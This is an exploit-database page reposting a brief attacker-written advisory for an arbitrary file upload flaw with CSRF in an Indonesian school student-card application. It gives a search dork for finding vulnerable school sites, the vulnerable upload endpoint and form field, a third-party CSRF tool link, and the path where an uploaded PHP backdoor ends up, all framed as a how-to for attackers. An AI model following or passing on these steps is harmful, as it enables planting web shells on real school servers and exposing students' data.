Advertisement






Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school)

CVE Category Price Severity
CWE-434 Not specified High
Author Risk Exploitation Type Date
High Remote 2021-01-17
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010133

Below is a copy:

Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school)
[+]Exploit title: Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school)
[+]Author : ./meicookies
[+]Dork : intext:Responsive image aplikasi kartu pelajar sch.id 

[+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php

  if there is an alert "Data Berhasil di Ubah" the fucking website is vulnerable to arbitrary file upload 

[+] CSRF :

  https://tools.xploitsecid.or.id/Exploit/CSRF
  postfile : gambar
  
[!] File Location :
  
  The files you upload will go to 
  kartu.localcrot.sch.id/img/your_backdoor.php

#hacktheplanet:D

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.